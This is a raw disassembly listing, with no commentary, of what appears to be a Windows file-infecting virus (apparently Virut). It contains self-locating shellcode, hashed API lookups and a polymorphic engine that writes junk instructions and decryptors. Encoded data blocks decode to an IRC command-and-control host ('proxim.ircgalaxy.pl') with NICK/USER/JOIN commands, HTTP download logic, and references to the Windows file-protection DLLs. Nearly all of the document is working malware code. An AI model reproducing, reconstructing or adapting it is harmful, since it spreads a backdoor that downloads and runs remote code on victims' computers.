push ebx
loc_31442A1D: ; CODE XREF: sub_314425AF+408�j
call dword ptr [ebp+103F22h]
add esp, 0Ch
call dword ptr [ebp+103F2Ah]
loc_31442A2C: ; CODE XREF: sub_314425AF:loc_314429B2�j
; sub_314425AF+417�j
add esp, 8
retn
; END OF FUNCTION CHUNK FOR sub_314425AF
; ---------------------------------------------------------------------------
db 8Dh ;
db 95h ; •
db 30h ; 0
db 3Eh ; >
db 10h
db 0
db 33h ; 3
db 0C9h ; É
db 6Ah ; j
db 0
db 52h ; R
db 68h ; h
db 30h ; 0
db 0
db 32h ; 2
db 0
db 8Bh ; ‹
db 0C4h ; Ä
db 51h ; Q
db 51h ; Q
db 6Ah ; j
db 40h ; @
db 50h ; P
db 51h ; Q
db 6Ah ; j
db 18h
db 83h ; ƒ
db 0C0h ; À
db 8
db 54h ; T
db 6Ah ; j
db 0Eh
db 50h ; P
db 0FFh
db 95h ; •
db 1Eh
db 3Fh ; ?
db 10h
db 0
db 83h ; ƒ
db 0C4h ; Ä
db 20h
db 33h ; 3
db 0D2h ; Ò
db 85h ; …
db 0C0h ; À
db 0Fh
db 99h ; ™
db 0C2h ; Â
db 0F7h ; ÷
db 0DAh ; Ú
db 58h ; X
db 23h ; #
db 0C2h ; Â
db 0C3h ; Ã
db 57h ; W
db 33h ; 3
db 0FFh
db 0E8h ; è
db 0C1h ; Á
db 0FFh
db 0FFh
db 0FFh
db 0Fh
db 84h ; „
db 0A5h ; ¥
db 0
db 0
db 0
db 50h ; P
db 68h ; h
db 28h ; (
db 73h ; s
db 0
db 0
db 8Bh ; ‹
db 0D4h ; Ô
db 6Ah ; j
db 0
db 8Bh ; ‹
db 0CCh ; Ì
db 6Ah ; j
db 40h ; @
db 68h ; h
db 0
db 0
db 10h
db 0
db 6Ah ; j
db 2
db 52h ; R
db 6Ah ; j
db 0
db 68h ; h
db 28h ; (
db 73h ; s
db 0
db 0
db 6Ah ; j
db 0
db 51h ; Q
db 53h ; S
db 50h ; P
db 0FFh
db 95h ; •
db 12h
db 3Fh ; ?
db 10h
db 0
db 5Fh ; _
db 59h ; Y
db 0FFh
db 95h ; •
db 62h ; b
db 3Eh ; >
db 10h
db 0
db 85h ; …
db 0FFh
db 74h ; t
db 71h ; q
db 8Bh ; ‹
db 8Dh ;
db 90h ;
db 15h
db 10h
db 0
db 0E3h ; ã
db 0Ch
db 8Dh ;
db 95h ; •
db 0
db 10h
db 10h
db 0
db 3
db 0D1h ; Ñ
db 57h ; W
db 53h ; S
db 0FFh
db 0D2h ; Ò
db 8Bh ; ‹
db 85h ; …
db 0FEh ; þ
db 3Eh ; >
db 10h
db 0
db 8Dh ;
db 8Fh ;
db 16h
db 29h ; )
db 0
db 0
db 0E8h ; è
db 2Bh ; +
db 0FFh
db 0FFh
db 0FFh
db 8Bh ; ‹
db 85h ; …
db 16h
db 3Fh ; ?
db 10h
db 0
db 8Dh ;
db 8Fh ;
db 63h ; c
db 29h ; )
db 0
db 0
db 0E8h ; è
db 1Ah
db 0FFh
db 0FFh
db 0FFh
db 8Bh ; ‹
db 85h ; …
db 2
db 3Fh ; ?
db 10h
db 0
db 8Dh ;
db 8Fh ;
db 6Ah ; j
db 29h ; )
db 0
db 0
db 0E8h ; è
db 9
db 0FFh
db 0FFh
db 0FFh
db 8Bh ; ‹
db 85h ; …
db 6
db 3Fh ; ?
db 10h
db 0
db 85h ; …
db 0C0h ; À
db 74h ; t
db 20h
db 8Dh ;
db 8Fh ;
db 77h ; w
db 29h ; )
db 0
db 0
db 0E8h ; è
db 0F4h ; ô
db 0FEh ; þ
db 0FFh
db 0FFh
db 8Bh ; ‹
db 85h ; …
db 0Eh
db 3Fh ; ?
db 10h
db 0
db 85h ; …
db 0C0h ; À
db 74h ; t
db 0Bh
db 8Dh ;
db 8Fh ;
db 84h ; „
db 29h ; )
db 0
db 0
db 0E8h ; è
db 0DFh ; ß
db 0FEh ; þ
db 0FFh
db 0FFh
db 8Bh ; ‹
db 0C7h ; Ç
db 5Fh ; _
db 0C3h ; Ã
db 55h ; U
db 0E8h ; è
db 0
db 0
db 0
db 0
; ---------------------------------------------------------------------------
pop ebp
sub ebp, 101B24h
xor ecx, ecx
lea eax, [ebp+101EAFh]
push ecx
push esp
push ecx
push ecx
push eax
push ecx
push ecx
call dword ptr [ebp+103E8Eh]
xchg eax, [esp]
call dword ptr [ebp+103E62h]
pop ebp
retn 4
; ---------------------------------------------------------------------------
db 55h, 0E8h, 0
dd 5D000000h, 1B53ED81h, 0FF6A0010h, 1B1E958Dh, 52500010h
dd 2420CDh, 0C483002Ah, 85C7660Ch, 101B64h, 85C720CDh
dd 101B66h, 2A0024h, 1A6AC35Dh, 9E858h, 428D0000h, 0C9FEAA61h
dd 69C3F075h, 103F7C95h, 8840500h, 95894208h, 103F7Ch
dd 55C3E2F7h, 0E8h, 0ED815D00h, 101BADh, 3F809D8Bh, 7C830010h
dd 0F000824h, 0B984h, 8EC8100h, 54000002h, 10468h, 0B695FF00h
dd 8B00103Eh, 24848DFCh, 104h, 0E8006A50h, 4, 525256h
dd 0B295FF57h, 3300103Eh, 4978DC9h, 51000001h, 51026A51h
dd 68016Ah, 52400000h, 3E7E95FFh, 85960010h, 505B74F6h
dd 1046854h, 0FF570000h, 22024B4h, 95FF0000h, 103F5Eh
dd 74C08559h, 5014E316h, 6AD48Bh, 56575152h, 3EF695FFh
dd 85590010h, 56D075C0h, 3E6295FFh, 578D0010h, 6A575244h
dd 978D5844h, 104h, 6AC033ABh, 0ABF35910h, 50505050h, 52505050h
dd 3E8695FFh, 0C4810010h, 208h, 82474FFh, 3F4E95FFh, 0FF530010h
dd 103F4E95h, 4C25D00h, 0A3E8000h, 8B460175h, 10158C8Dh
dd 8D19E300h, 10100095h, 56D10300h, 0C084D2FFh, 11F880Fh
dd 840F0000h, 110h, 753A3E80h, 3E804610h, 1840F00h, 80000001h
dd 0F175203Eh, 503E8146h, 75474E49h, 0C6CF8B42h, 2B4F0146h
dd 6A51CEh, 0FF535651h, 103F4695h, 0C13B5900h, 0DF850Fh
dd 858D0000h, 101EA3h, 0C68006Ah, 50000000h, 4695FF53h
dd 3D00103Fh, 0Ch, 0BF850Fh, 0B1E90000h, 81000000h, 4952503Eh
dd 0A5850F56h, 83000000h, 3CAC08C6h, 99840F0Dh, 3C000000h
dd 0ACF37520h, 850F3A3Ch, 8Ch, 20200DADh, 213D2020h, 75746567h
dd 203CAC7Fh, 7E817C75h, 746820FFh, 81717574h, 3A70037Eh
dd 68752F2Fh, 0FF47C6h, 10BA310Fh, 0F7000027h, 95FF52E2h
dd 103EE6h, 5050C033h, 9E85050h, 44000000h, 6C6E776Fh
dd 64616Fh, 3F5695FFh, 0C0850010h, 0C9333674h, 3F808589h
dd 68510010h, 80000200h, 50565151h, 3F5A95FFh, 958D0010h
dd 101BA7h, 54C93350h, 51525051h, 8E95FF51h, 8700103Eh
dd 95FF2404h, 103E62h, 8D80C3F8h, 10157Fh, 6AC3F901h, 0FF016A01h
dd 473FF33h, 0C08515FFh, 0DB335A74h, 0BB3D08Bh, 8D3C5003h
dd 101DCBB5h, 0CBA8B00h, 8B000001h, 1088Ah, 2BF80300h
dd 0CB8B60CBh, 7461A6F3h, 0F5E24705h, 0C7832EEBh, 0CC8B530Fh
dd 50D48B57h, 51406A54h, 0FFFF6A52h, 103F2295h, 968D8B00h
dd 8300103Eh, 0CF2B0CC4h, 0C707E983h, 0E8006A07h, 34F8900h
dd 464F53C3h, 52415754h, 694D5C45h, 736F7263h, 5C74666Fh
dd 646E6957h, 5C73776Fh, 72727543h, 56746E65h, 69737265h
dd 455C6E6Fh, 6F6C7078h, 726572h, 67726154h, 6F487465h
dd 2007473h, 7F500000h, 70010000h, 69786F72h, 72692E6Dh
dd 6C616763h, 2E797861h, 4E006C70h, 204B4349h, 6C716274h
dd 6A6C6975h, 4553550Ah, 4A6D2052h, 204E494Fh, 72697626h
dd 550A7574h, 0E8h, 0ED815D00h, 101EB5h, 157F85C6h, 0FF000010h
dd 103EBA95h, 1FE8C100h, 1E6A3C74h, 3E72B58Bh, 0AC590010h
dd 2A752E3Ch, 0FF3E8166h, 8D23751Dh, 103F76BDh, 2768B00h
dd 0A566A557h, 38EC858Dh, 858F0010h, 103912h, 0FA4689FAh
dd 0FBFE4E8Ch, 0CFE201B1h, 21E850EBh, 83FFFFFBh, 408247Ch
dd 8E84475h, 53000000h, 442E4346h, 0FF004C4Ch, 103EC695h
dd 74C00B00h, 26A930Dh, 6E95FF53h, 0FF00103Eh, 97E893D0h
dd 0E8FFFFFEh, 0Bh, 5F434653h, 442E534Fh, 0FF004C4Ch, 103EC695h
dd 0FE7CE800h, 0E8FFFFh, 0FFFFFFF6h, 1012D48Dh, 8DC93300h
dd 10432485h, 51515100h, 51515051h, 0C295FF51h, 0E800103Eh
dd 0Bh, 52455355h, 442E3233h, 0FF004C4Ch, 103EC695h, 0AE800h
dd 73770000h, 6E697270h, 416674h, 6E95FF50h, 8900103Eh
dd 103E7685h, 8D310F00h, 1019858Dh, 7C858900h, 5100103Fh
dd 3EC695FFh, 68930010h, 4, 1992B58Dh, 8D590010h, 103F62BDh
dd 0F5C2E800h, 0C766FFFFh, 101E7585h, 83500000h, 101E77A5h
dd 958D0000h, 101E35h, 16A5450h, 6852006Ah, 80000002h
dd 3F6695FFh, 0C0850010h, 8D22755Ah, 101E688Dh, 66A5200h
dd 1E75B58Dh, 56540010h, 52515050h, 3F6A95FFh, 0FF580010h
dd 103F6295h, 8385C600h, 1041h, 0CE8h, 4F535700h, 32334B43h
dd 4C4C442Eh, 0C695FF00h, 9300103Eh, 768h, 0E9B58D00h
dd 59001018h, 3F32BD8Dh, 3DE80010h, 0E8FFFFF5h, 0Ch, 494E4957h
dd 2E54454Eh, 4C4C44h, 3EC695FFh, 0C0850010h, 235840Fh
dd 68930000h, 5, 1927B58Dh, 8D590010h, 103F4EBDh, 0F506E800h
dd 0BD83FFFFh, 103F52h, 10840F00h, 81000002h, 190ECh, 1685400h
dd 0FF000001h, 103F3295h, 90C48100h, 50000001h, 6AD48Bh
dd 5295FF52h, 8500103Fh, 0D7559C0h, 138868h, 0E695FF00h
dd 0EB00103Eh, 77BD83E2h, 101Eh, 858D2975h, 101E7Bh, 3E95FF50h
dd 8500103Fh, 89840FC0h, 8B000001h, 8B0C40h, 858F30FFh
dd 101E77h, 418385C6h, 6A010010h, 6A016A00h, 4A95FF02h
dd 8300103Fh, 840FFFF8h, 160h, 73958D93h, 6A00101Eh, 0FF535210h
dd 103F3A95h, 0FC08500h, 14085h, 94BD8D00h, 0B100101Eh
dd 0FA3CE808h, 9468FFFFh, 5E000000h, 3489E62Bh, 95FF5424h
dd 103EBEh, 1EA2BD8Dh, 1B10010h, 0FFFA1DE8h, 8F958DFFh
dd 6A00101Eh, 146800h, 53520000h, 3F4695FFh, 448D0010h
dd 958D1424h, 104324h, 0AB60F50h, 1424448Bh, 208E0C1h
dd 4A12014Ah, 34A1202h, 824440Bh, 0C10FE180h, 0B5108E0h
dd 0FF102444h, 0BD8D5032h, 103F84h, 1CE8h, 362E2500h, 202E2078h
dd 253A202Eh, 382E2525h, 20782578h, 4A0A7325h, 204E494Fh
dd 95FF5700h, 103E76h, 0ACC481h, 6A0000h, 0FF535750h, 103F4695h
dd 988D8B00h, 6A001015h, 6B1BE300h, 0E8510DC9h, 5, 0A642526h
dd 95FF5700h, 103E76h, 500CC483h, 7680BEBh, 8D000000h
dd 101EA8BDh, 0FF535700h, 103F4695h, 7EC08500h, 84B58D54h
dd 8300103Fh, 101598A5h, 8D8D0000h, 104183h, 6ACE2Bh, 0FF535651h
dd 103F4295h, 0F88300h, 8B912F7Eh, 84B58DFEh, 0B000103Fh
dd 75AEF20Dh, 2AE86010h, 61FFFFFAh, 9E31772h, 0EB01778Dh
dd 2BCF8BEAh, 84BD8DCEh, 0F300103Fh, 0EBF787A4h, 95FF53B9h
dd 103F36h, 157FBD80h, 74010010h, 7530682Ah, 95FF0000h
dd 103EE6h, 4183BD80h, 74000010h, 7785C711h, 101Eh, 0C6000000h
dd 10418385h, 8E90000h, 0C7FFFFFEh, 10158885h, 0
dd 4C25D80h, 4F0A0D00h, 6F6F6E20h, 666F206Eh, 66696C20h
dd 4F202165h, 6D697420h, 6F742065h, 6C656320h, 61726265h
dd 0D216574h, 2020200Ah, 204F2020h, 6D6D7573h, 67207265h
dd 65647261h, 0A0D216Eh, 656C6552h, 656C746Eh, 796C7373h
dd 70616820h, 61207970h, 6520646Eh, 63657078h, 746E6174h
dd 7473202Ch, 69646E61h, 203A676Eh, 570A0D2Dh, 68637461h
dd 20676E69h, 206C6C61h, 20796164h, 20646E61h, 6867696Eh
dd 66202C74h, 6620726Fh, 6E656972h, 49207364h, 69617720h
dd 0A0D3A74h, 72656857h, 72612065h, 6F792065h, 66202C75h
dd 6E656972h, 203F7364h, 656D6F43h, 74492021h, 20736920h
dd 656D6974h, 74492021h, 6C207327h, 21657461h, 3AAB5957h
dd 10A61429h, 4CA2A1A8h, 0D8B8B352h, 9C77466h, 0C26CCC5Ch
dd 10A61413h, 823BE0B8h, 0C89FCC00h, 0ABD8C6BDh, 3E9DF5C3h
dd 2FA2F473h, 14h dup(0)
; =============== S U B R O U T I N E =======================================
sub_31443414 proc near ; CODE XREF: sub_314434CA:loc_314434B8�p
; sub_3144351B+7�p ...
arg_0 = dword ptr 4
pusha
and dword ptr [ebp+1042F4h], 0
and dword ptr [ebp+1042F8h], 0
movzx eax, word ptr [ebx+14h]
lea edx, [ebx+18h]
movzx ecx, word ptr [ebx+6]
add edx, eax
loc_31443430: ; CODE XREF: sub_31443414+41�j
mov eax, [esp+20h+arg_0]
sub eax, [edx+0Ch]
jb short loc_31443452
cmp eax, [edx+8]
jnb short loc_31443452
mov eax, [edx+14h]
sub eax, [edx+0Ch]
mov [ebp+1042F4h], edx
mov [ebp+1042F8h], eax
jmp short loc_31443457
; ---------------------------------------------------------------------------
loc_31443452: ; CODE XREF: sub_31443414+23�j
; sub_31443414+28�j
add edx, 28h
loop loc_31443430
loc_31443457: ; CODE XREF: sub_31443414+3C�j
popa
retn 4
sub_31443414 endp
; ---------------------------------------------------------------------------
mov [ebp+102467h], al
call sub_314434CA
push 20h
lea eax, [ebp+102394h]
pop ecx
loc_31443472: ; CODE XREF: UPX2:31443479�j
cmp [eax], ebx
jz short loc_31443482
add eax, 4
loop loc_31443472
inc dword ptr [ebp+1042D0h]
retn
; ---------------------------------------------------------------------------
loc_31443482: ; CODE XREF: UPX2:31443474�j
neg ecx
add ecx, [ebp+102467h]
jecxz short loc_3144349C
loc_3144348C: ; CODE XREF: UPX2:31443494�j
push dword ptr [eax-4]
pop dword ptr [eax]
sub eax, 4
loop loc_3144348C
mov [ebp+102394h], ebx
; START OF FUNCTION CHUNK FOR sub_314434CA
loc_3144349C: ; CODE XREF: UPX2:3144348A�j
; sub_314434CA+34�j
cmp dword ptr [edx], 0
jz short loc_314434A6
sub esi, [edx]
add esi, [edx+10h]
loc_314434A6: ; CODE XREF: sub_314434CA-2B�j
lea ecx, [esi-4]
pop eax
pop ebx
pop esi
cmp dword ptr [edx], 0
jz short loc_314434B5
push dword ptr [edx]
jmp short loc_314434B8
; ---------------------------------------------------------------------------
loc_314434B5: ; CODE XREF: sub_314434CA-1B�j
push dword ptr [edx+10h]
loc_314434B8: ; CODE XREF: sub_314434CA-17�j
call sub_31443414
sub ecx, esi
sub ecx, [ebp+1042F8h]
pop eax
add ecx, [ebx+34h]
retn
; END OF FUNCTION CHUNK FOR sub_314434CA
; =============== S U B R O U T I N E =======================================
sub_314434CA proc near ; CODE XREF: UPX2:31443461�p
; FUNCTION CHUNK AT 3144349C SIZE 0000002E BYTES
pop dword ptr [ebp+1042D4h]
mov dword ptr [ebp+1042D0h], 0
call sub_3144351B
mov eax, [ebp+1042D0h]
call near ptr dword_31442B50+43h
call sub_31443507
cmp dword ptr [ebp+1042D0h], 0
jnz short loc_31443500
mov [ebp+102410h], ebx
jmp short loc_3144349C
; ---------------------------------------------------------------------------
loc_31443500: ; CODE XREF: sub_314434CA+2C�j
dec dword ptr [ebp+1042D0h]
retn
sub_314434CA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_31443507 proc near ; CODE XREF: sub_314434CA+20�p
pop dword ptr [ebp+1042D4h]
mov [ebp+1042D0h], edx
call sub_3144351B
xor ecx, ecx
retn
sub_31443507 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3144351B proc near ; CODE XREF: sub_314434CA+10�p
; sub_31443507+C�p ...
var_C = dword ptr -0Ch
var_4 = dword ptr -4
mov edx, [ebx+80h]
push edx
call sub_31443414
add edx, [ebp+1042F8h]
add edx, esi
loc_3144352F: ; CODE XREF: sub_3144351B+120�j
cmp dword ptr [edx+0Ch], 0
jz locret_31443640
cmp dword ptr [edx+10h], 0
jz locret_31443640
mov eax, [edx+0Ch]
push eax
call sub_31443414
add eax, [ebp+1042F8h]
add eax, esi
push eax
loc_31443555: ; CODE XREF: sub_3144351B+47�j
mov cl, [eax]
cmp cl, 0
jz short loc_31443575
cmp cl, 2Eh
jz short loc_31443564
loc_31443561: ; CODE XREF: sub_3144351B+58�j
inc eax
jmp short loc_31443555
; ---------------------------------------------------------------------------
loc_31443564: ; CODE XREF: sub_3144351B+44�j
mov ecx, [eax+1]
and ecx, 0DFDFDFDFh
cmp ecx, 4C4C44h
jnz short loc_31443561
loc_31443575: ; CODE XREF: sub_3144351B+3F�j
pop ecx
sub ecx, eax
cmp ecx, 0FFFFFFFAh
jg loc_31443638
cmp word ptr [eax-2], 3233h
jnz loc_31443638
push esi
cmp dword ptr [edx], 0
jnz short loc_31443598
mov ecx, [edx+10h]
jmp short loc_3144359A
; ---------------------------------------------------------------------------
loc_31443598: ; CODE XREF: sub_3144351B+76�j
mov ecx, [edx]
loc_3144359A: ; CODE XREF: sub_3144351B+7B�j
add esi, ecx
push ecx
call sub_31443414
add esi, [ebp+1042F8h]
loc_314435A8: ; CODE XREF: sub_3144351B+90�j
; sub_3144351B+117�j
lodsd
test eax, eax
js short loc_314435A8
jz loc_31443637
push dword ptr [ebp+1042F8h]
push eax
call sub_31443414
add eax, [ebp+1042F8h]
pop dword ptr [ebp+1042F8h]
add eax, [esp+4+var_4]
push ebx
add eax, 2
xor ebx, ebx
loc_314435D4: ; CODE XREF: sub_3144351B+CE�j
movzx ecx, byte ptr [eax]
jecxz short loc_314435EB
or cl, 20h
push ebx
shl [esp+0Ch+var_C], 4
sub [esp+0Ch+var_C], ebx
sub [esp+0Ch+var_C], ecx
pop ebx
inc eax
jmp short loc_314435D4
; ---------------------------------------------------------------------------
loc_314435EB: ; CODE XREF: sub_3144351B+BC�j
cmp ebx, 0DDBBD70Fh
jz short loc_31443631
cmp ebx, 0DB6E45A8h
jz short loc_31443631
cmp ebx, 0FFA13B59h
jz short loc_31443631
cmp ebx, 0ACB522D6h
jz short loc_31443631
cmp ebx, 0F358E993h
jz short loc_31443631
cmp ebx, 0F358E97Dh
jz short loc_31443631
cmp ebx, 0E1253F46h
jz short loc_31443631
cmp ebx, 0E1253F30h
jz short loc_31443631
call dword ptr [ebp+1042D4h]
loc_31443631: ; CODE XREF: sub_3144351B+D6�j
; sub_3144351B+DE�j ...
pop ebx
jmp loc_314435A8
; ---------------------------------------------------------------------------
loc_31443637: ; CODE XREF: sub_3144351B+92�j
pop esi
loc_31443638: ; CODE XREF: sub_3144351B+60�j
; sub_3144351B+6C�j
add edx, 14h
jmp loc_3144352F
; ---------------------------------------------------------------------------
locret_31443640: ; CODE XREF: sub_3144351B+18�j
; sub_3144351B+22�j
retn
sub_3144351B endp
; ---------------------------------------------------------------------------
db 1, 6Ah, 4
dd 0F549E858h, 9588FFFFh, 102641h, 1831B866h, 0E4C0E202h
dd 66E20203h, 58066AABh, 0FFF52EE8h, 8C283FFh, 56AD187h
dd 0F521E858h, 0FA80FFFFh, 0B00B7303h, 41850250h, 0AA001026h
dd 686A27EBh, 0FA80AA58h, 0B0187503h, 0F501E811h, 1B8FFFFh
dd 84000000h, 0D10D74D2h, 0EBCAFEE0h, 0B805EBF6h, 80000000h
dd 0C3BFE2ABh, 39CC958Dh, 0D72B0010h, 0F7C3DAF7h, 1039C085h
dd 0
; ---------------------------------------------------------------------------
adc [edi], cl
xchg eax, ebp
rol cl, 0E0h
or esi, esi
test [esi+1001039h], edi
jnz short loc_314436D6
or ax, 2589h
jmp short loc_314436E9
; ---------------------------------------------------------------------------
loc_314436D6: ; CODE XREF: UPX2:314436CE�j
test byte ptr [ebp+1039BEh], 2
jnz short loc_314436E5
or ax, 2531h
jmp short loc_314436E9
; ---------------------------------------------------------------------------
loc_314436E5: ; CODE XREF: UPX2:314436DD�j
or ax, 2501h
loc_314436E9: ; CODE XREF: UPX2:314436D4�j
; UPX2:314436E3�j
stosw
call near ptr dword_31443644+68h
mov eax, [ebx+34h]
mov [ebp+1042E8h], edx
stosd
retn
; =============== S U B R O U T I N E =======================================
sub_314436FB proc near ; CODE XREF: UPX2:31443D47�p
test dword ptr [ebp+1039C0h], 10000000h
setnz al
add al, 0BCh
stosb
call near ptr dword_31443644+68h
mov [ebp+1042ECh], edx
test byte ptr [ebp+1039BEh], 1
jnz short loc_31443723
rdtsc
jmp short loc_31443725
; ---------------------------------------------------------------------------
loc_31443723: ; CODE XREF: sub_314436FB+22�j
sub eax, eax
loc_31443725: ; CODE XREF: sub_314436FB+26�j
stosd
retn
sub_314436FB endp
; =============== S U B R O U T I N E =======================================
sub_31443727 proc near ; CODE XREF: UPX2:loc_31443D51�p
test dword ptr [ebp+1039C0h], 10000000h
jz short loc_3144375A
mov al, [ebp+1039BAh]
shl eax, 0Bh
or ax, 458Bh
stosw
mov al, 0F8h
stosb
mov al, [ebp+1039BAh]
shl eax, 1Bh
add eax, 6896467h
stosd
xor eax, eax
stosw
jmp short locret_3144376C
; ---------------------------------------------------------------------------
loc_3144375A: ; CODE XREF: sub_31443727+A�j
mov eax, 58F64h
stosd
mov al, [ebp+1039BAh]
add al, 58h
shl eax, 18h
stosd
locret_3144376C: ; CODE XREF: sub_31443727+31�j
retn
sub_31443727 endp
; =============== S U B R O U T I N E =======================================
sub_3144376D proc near ; CODE XREF: sub_314437DF:loc_31443806�p
; sub_314437DF+4C�p ...
mov byte ptr [ebp+10279Ch], 9
jmp short loc_3144379B
; ---------------------------------------------------------------------------
loc_31443776: ; CODE XREF: sub_3144376D+44�j
mov al, 0FCh
jmp short loc_3144379A
; ---------------------------------------------------------------------------
loc_3144377A: ; CODE XREF: sub_3144376D+48�j
mov ax, 0EBh
stosw
jmp short loc_3144379B
; ---------------------------------------------------------------------------
loc_31443782: ; CODE XREF: sub_3144376D+4C�j
push 4
pop eax
call near ptr dword_31442B50+43h
lea eax, [edx+edx*8]
shl eax, 8
add ax, 0C089h
stosw
jmp short loc_3144379B
; ---------------------------------------------------------------------------
loc_31443798: ; CODE XREF: sub_3144376D+50�j
mov al, 90h
loc_3144379A: ; CODE XREF: sub_3144376D+B�j
; sub_3144376D+60�j ...
stosb
loc_3144379B: ; CODE XREF: sub_3144376D+7�j
; sub_3144376D+13�j ...
push 21h
pop eax
call near ptr dword_31442B50+43h
add byte ptr [ebp+10279Ch], 6
cmp dl, 8
jnb short locret_314437DE
test dl, dl
jz short loc_31443776
dec dl
jz short loc_3144377A
dec dl
jz short loc_31443782
dec dl
jz short loc_31443798
dec dl
jz short loc_314437CF
dec dl
jz short loc_314437D6
dec dl
jz short loc_314437DA
mov al, 0F9h
jmp short loc_3144379A
; ---------------------------------------------------------------------------
loc_314437CF: ; CODE XREF: sub_3144376D+54�j
mov al, 87h
stosb
mov al, 0DBh
jmp short loc_3144379A
; ---------------------------------------------------------------------------
loc_314437D6: ; CODE XREF: sub_3144376D+58�j
mov al, 0F5h
jmp short loc_3144379A
; ---------------------------------------------------------------------------
loc_314437DA: ; CODE XREF: sub_3144376D+5C�j
mov al, 0F8h
jmp short loc_3144379A
; ---------------------------------------------------------------------------
locret_314437DE: ; CODE XREF: sub_3144376D+40�j
retn
sub_3144376D endp
; =============== S U B R O U T I N E =======================================
sub_314437DF proc near ; CODE XREF: UPX2:loc_31443C28�p
; UPX2:31443DDB�p
test dword ptr [ebp+1039C0h], 2000h
mov al, 86h
jnz short loc_314437EF
add al, 4
loc_314437EF: ; CODE XREF: sub_314437DF+C�j
lea ecx, [edi-2]
mov ah, [ebp+1039B8h]
stosw
cmp ah, 5
jnz short loc_31443806
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_31443806: ; CODE XREF: sub_314437DF+1E�j
call sub_3144376D
test dword ptr [ebp+1039C0h], 4000h
mov ax, 3166h
jnz short loc_3144381D
mov ah, 29h
loc_3144381D: ; CODE XREF: sub_314437DF+3A�j
stosw
mov al, 18h
or al, [ebp+1039BAh]
shl al, 3
stosb
call sub_3144376D
mov al, 88h
test dword ptr [ebp+1039C0h], 8000h
jnz short loc_31443840
mov al, 86h
loc_31443840: ; CODE XREF: sub_314437DF+5D�j
mov ah, [ebp+1039B8h]
stosw
cmp ah, 5
jnz short locret_31443854
mov al, 0
or byte ptr [edi-1], 40h
stosb
locret_31443854: ; CODE XREF: sub_314437DF+6C�j
retn
sub_314437DF endp
; ---------------------------------------------------------------------------
loc_31443855: ; CODE XREF: sub_3144445B+183�p
lea edi, [ebp+1039CCh]
call sub_3144376D
test dword ptr [ebp+1039C0h], 400000h
jz short near ptr unk_3144386F
mov al, 60h
stosb
; ---------------------------------------------------------------------------
unk_3144386F db 0F7h ; ÷ ; CODE XREF: UPX2:3144386A�j
db 85h ; …
db 0C0h ; À
db 39h ; 9
db 10h
db 0
db 0
db 0
db 0
; ---------------------------------------------------------------------------
adc [edi+eax-48h], dh
push ebp
mov ebp, esp
add [ebx-3F7A08B1h], ch
cmp [eax], edx
add [ebx], al
; ---------------------------------------------------------------------------
db 2 dup(0), 2
dd 0F0840Fh, 0E8B00000h, 0BD89ABAAh, 1042D8h, 0FFFECCE8h
dd 0AAE8B0FFh, 0DCBD89ABh, 0E8001042h, 0FFFFFEBDh, 39C085F7h
dd 30010h, 1A740000h, 39C085F7h, 10h, 0A740200h, 0FFFE2EE8h
dd 0FE9BE8FFh, 0E9B0FFFFh, 858BABAAh, 1042D8h, 0C82BCF8Bh
dd 42E0BD89h, 48890010h, 6467B8FCh, 33AB36FFh, 0F7AB66C0h
dd 1039C085h, 300h, 0F6137400h, 1039BE85h, 0A748000h, 0FFFDAAE8h
dd 0FE5BE8FFh, 67B8FFFFh, 0AB268964h, 0AB66C033h, 39C085F7h
dd 30010h, 5A740000h, 39BE85F6h, 75800010h, 0FD81E80Ah
dd 32E8FFFFh, 0E8FFFFFEh, 0FFFFFD02h, 14E820B0h, 0E3FFFFFBh
dd 0FFB86639h, 91AB6615h, 0C0958BABh, 0F7001039h, 3C2F7D2h
dd 75000000h, 0FCDCE814h, 1FB0FFFFh, 0FFFAEEE8h, 0FFB866FFh
dd 91AB6615h, 8BCF8BABh, 1042E085h, 89C82B00h, 85F7FC48h
dd 1039C0h, 3, 85F73874h, 1039C0h, 0C000000h, 85F72C74h
dd 1039C0h, 2000000h, 0C2E80A75h, 0E8FFFFFDh, 0FFFFFD4Bh
dd 39C085F7h, 10h, 0A740800h, 0FFFDACE8h, 0FD61E8FFh, 85F7FFFFh
dd 1039C0h, 4, 96E81774h, 0B8FFFFFDh, 0C8FEC029h, 0C008B8ABh
dd 0B8AB0474h, 67EBF875h, 0FD7FE8ABh, 85F7FFFFh, 1039C0h
dd 8, 0BD807275h, 1039BEh, 0E8697400h, 0FFFFFD65h, 291829B8h
dd 0BAA50AC9h, 0C0001039h, 0A50A03E4h, 1039BAh, 0FD4BE8ABh
dd 0B1B0FFFFh, 0BE858AAAh, 0AA001039h, 0FFFD3CE8h, 85B60FFFh
dd 1039BAh, 4C0048Dh, 8E0C140h, 0AB668DB0h, 57AA01B0h
dd 0FFFD20E8h, 243C29FFh, 0FBE2B866h, 0C085F759h, 10001039h
dd 74000000h, 0AA49B007h, 0FA75B866h, 0AB66E102h, 0FFFCFCE8h
dd 0AAE8B0FFh, 89ABC033h, 1042C4BDh, 0C085F700h, 20001039h
dd 75000000h, 0DEE8573Bh, 0F7FFFFFCh, 1039C085h, 0
dd 89187480h, 1042F0BDh, 0FD39E800h, 0C2E8FFFFh, 0B0FFFFFCh
dd 0BAE8AAC3h, 5AFFFFFCh, 58B0CF8Bh, 850ACA2Bh, 1039B8h
dd 0AAFC4A89h, 0FFFCA4E8h, 81B866FFh, 0C085F7C0h, 40001039h
dd 74000000h, 28C48003h, 39B8A50Ah, 0AB660010h, 42C8BD89h
dd 0F7AB0010h, 1039C085h, 0
; ---------------------------------------------------------------------------
inc eax
jnz short loc_31443B00
mov al, 50h
add al, [ebp+1039B8h]
stosb
loc_31443B00: ; CODE XREF: UPX2:31443AF5�j
test dword ptr [ebp+1039C0h], 80h
jnz short loc_31443B17
mov al, 0B8h
or al, [ebp+1039B9h]
stosb
jmp short loc_31443B54
; ---------------------------------------------------------------------------
loc_31443B17: ; CODE XREF: UPX2:31443B0A�j
mov ax, 1831h
test dword ptr [ebp+1039C0h], 100h
jz short loc_31443B29
mov al, 29h
loc_31443B29: ; CODE XREF: UPX2:31443B25�j
or ah, [ebp+1039B9h]
shl ah, 3
or ah, [ebp+1039B9h]
stosw
mov ax, 0F081h
test dword ptr [ebp+1039C0h], 200h
jnz short loc_31443B4C
mov ah, 0C8h
loc_31443B4C: ; CODE XREF: UPX2:31443B48�j
or ah, [ebp+1039B9h]
stosw
loc_31443B54: ; CODE XREF: UPX2:31443B15�j
mov [ebp+1042E4h], edi
mov eax, 29CCh
stosd
